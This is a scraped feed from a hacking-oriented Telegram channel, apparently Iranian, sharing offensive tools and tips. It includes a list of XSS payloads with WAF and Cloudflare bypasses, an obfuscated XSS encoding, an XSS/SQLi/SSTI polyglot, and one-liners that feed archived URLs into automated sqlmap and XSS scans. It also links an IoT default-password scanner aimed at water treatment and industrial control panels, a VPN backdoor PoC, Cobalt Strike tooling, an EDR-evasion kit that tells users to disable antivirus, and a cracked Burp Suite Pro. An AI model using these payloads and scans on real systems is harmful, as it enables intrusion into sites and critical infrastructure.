0Day.Today | Learn Exploit | Zero World | Dark web |
20.5K subscribers
1.25K photos
133 videos
491 files
1.3K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
💣 Genzai 💣

💬
Genzai helps you identify IoT or Internet of Things related dashboards across a single or set of targets provided as an input and furthermore scan them for default password issues and potential vulnerabilities based on paths and versions.

📊 Features:
⚪️ Wireless Router
⚪️ Surveillance Camera
⚪️ HMI or Human Machine Interface
⚪️ Smart Power Control
⚪️ Building Access Control System
⚪️ Climate Control
⚪️ Industrial Automation
⚪️ Home Automation
⚪️ Water Treatment System

😸 Github

⬇️ Download
🔒 LearnExploit

#GO #iot #Security #Tools

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
53🔥3👍1
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3👍2❤‍🔥1
XSS payload ⚡️

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script> ( Encoded by chatGPT )

jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)

#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5👍31
قیمت Ton هم شده 7 دلار 🔥

قیمت هر 10 میلیون نات کوینم فاکینگ رفته بود رو 100 دلار
😵💎

پیشنهادم اینه حداقل برای خودتون مقداریم شده TonCoin بخرید❗️

——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍2
پاول دورف اعلام کرده که تعداد کاربران فعال تلگرام از مرز ۹۰۰ میلیون کاربر در ماه عبور کرده و این اپ ۶‌امین اپ پراستفاده و پردانلود در جهان هست.

درامدهای تلگرام در فصل اول ۲۰۲۴ از هزینه هاش فراتر رفته و به گفته دورف این اپ امسال به سوددهی میرسه.

#News
——————‌
0Day.Today
@LearnExploit
@Tech_Army
UPSTYLE backdoor targeting GlobalProtect VPN devices via CVE-2024-3400 in 3 images/stages 🔥

Github

#poc #backdoor #0day
——————‌
0Day.Today
@LearnExploit
@Tech_Army
GraphStrike: Cobalt Strike HTTPS beaconing over Microsoft Graph API

Link

#cobalt_strike #tools
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3👍1
XSS Tip 🥵

If alert() is being converted to ALERT() and you can use
Like onerror="

𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"

#XSS #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3❤‍🔥3🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
CrimsonEDR

💬
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.

🔼 Installation:
⚪️ Install dependancy:
sudo apt-get install gcc-mingw-w64-x86-64
⚪️ Download repository
⚪️ Compile the project:
cd CrimsonEDR;
chmod +x compile.sh;
./compile.sh

⚠️ Warning:
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

💻 Example:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

😸 Github

⬇️ Download
🔒 LearnExploit

#C #Simulate #Malware #Dev

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥31👍1
Payload for XSS + SQLi + SSTI/CSTI !

'"><svg/onload=prompt(5);>{{7*7}}

' ==> for Sql injection

"><svg/onload=prompt(5);> ==> for XSS

{{7*7}} ==> for SSTI/CSTI

#XSS #SQLI

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥31
SQLMap from Waybackurls

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#Sqlmap #BugBounty #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
5🔥32👍1
xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln

⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )
🔒 LearnExploit ( BOT )

#XSS #BugBounty #Oneliner #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥432👍2
👁 Burpsuite Pro 👁

🔥 v2024.3.1

🔔 BurpBountyPro_v2.8.0

📂 README (en+ru) included, plz read it before run BS.

🔼 Run this version With Java SE JDK 22

⬇️ Download

#Burpsuite #Pro #Tools

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
42👍2🔥2
CVE-2024-31497: Critical PuTTY Vulnerability Exposes Private Keys

Link

#cve
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍1
یه سرچ انجین جالب که میتونین توش مثل گوگل رایت اپ ها و پیلود ها و .... رو پیدا کنید 👌

Link

#writeup #پیشنهادی
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5❤‍🔥1👍1
SQLMap from Waybackurls ⚡️

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#sql #sql_injection #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army
6
VormWeb - Tor search engine ⚡️

volkancfgpi4c7ghph6id2t7vcntenuly66qjt6oedwtjmyj4tkk5oqd.onion

#Tor #Darkweb
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍5❤‍🔥1